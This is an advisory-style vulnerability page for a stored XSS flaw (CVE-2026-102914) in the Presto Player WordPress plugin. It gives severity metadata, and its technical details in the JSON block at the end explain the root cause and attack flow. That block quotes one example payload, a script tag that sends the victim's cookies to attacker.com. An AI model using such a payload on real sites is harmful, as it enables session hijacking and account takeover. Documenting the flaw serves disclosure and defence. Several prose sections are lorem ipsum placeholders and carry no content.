Sceawere
Vulnerability Detail
CVE-2026-102914UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV
Presto Player Stored XSS
Vulnerability Metadata
- Severity
- Medium
- Score / CVSS
- 6.5
- Creation Date
- 10h ago
- Vendor
- Brainstorm Force
- Product
- Presto Player
- Attack Type
- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- Vector String
- CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
- Attack Complexity
- LOW
Narrative and Response
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brainstorm Force Presto Player presto-player allows Stored XSS.This issue affects Presto Player: from n/a through 4.5.2.
Executive Summary
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Technical Details
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Mitigations
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
References
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Additional Metadata
{
"score": "6.5",
"pubDate": "2026-10-05T09:17:06.000Z",
"pubdate": "2026-10-05T09:17:06.000Z",
"executiveSummary": "Brainstorm Force Presto Player, versions n/a through 4.5.2, contains a Stored Cross-Site Scripting (XSS) vulnerability categorized under CWE-79 (Improper Neutralization of Input During Web Page Generation).\nThis vulnerability occurs because the application fails to properly sanitize or escape user-supplied input before rendering it in the browser.\nA remote, authenticated attacker with sufficient privileges to modify plugin settings or content can inject malicious JavaScript payloads.\nWhen a victim, such as an administrator or another user, views the affected page, the malicious script executes within their session context.\nThis facilitates unauthorized actions, including the theft of sensitive session cookies, account takeover, or redirection to malicious domains.\nGiven the nature of Stored XSS, the payload persists on the server, making it a high-risk security flaw for WordPress environments relying on this plugin.",
"technicalDetails": "The vulnerability is a classic Stored Cross-Site Scripting (XSS) flaw stemming from the insufficient sanitization of user-controllable input within the Presto Player plugin codebase.\nRoot Cause: The plugin fails to apply robust output encoding or server-side input validation on specific parameters or fields processed by the plugin before they are stored in the database and subsequently rendered in the WordPress admin or front-end interface.\nExploitation Method: An attacker with the ability to inject data into the vulnerable fields can supply a malicious JavaScript payload instead of expected legitimate data. When the affected web page is loaded by a user, the application backend retrieves the unsanitized payload from the database and inserts it directly into the HTML response.\nAttack Flow: 1. The attacker identifies a form field or configuration setting within the Presto Player plugin that is rendered unsafely on the page. 2. The attacker submits a malicious script payload (e.g., <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>) into that field. 3. The plugin saves this input directly into the WordPress database without sanitization. 4. A victim (likely an administrator) accesses the page where the stored input is rendered. 5. The victim's browser interprets the malicious script as legitimate code and executes it within the context of the origin, enabling the attacker to perform actions on behalf of the victim.\nAuthentication/Privilege Requirements: Successful exploitation typically requires authentication, specifically at a privilege level that allows the modification of settings or content managed by the Presto Player plugin.\nPost-Exploitation Impact: Since the script executes in the context of the user viewing the payload, the attacker can leverage this for full administrative session hijacking if an administrator is targeted. Furthermore, the script can be used to perform unauthorized operations, modify site configuration, inject additional malicious content, or exfiltrate sensitive data stored in the user's browser, such as authentication tokens."
}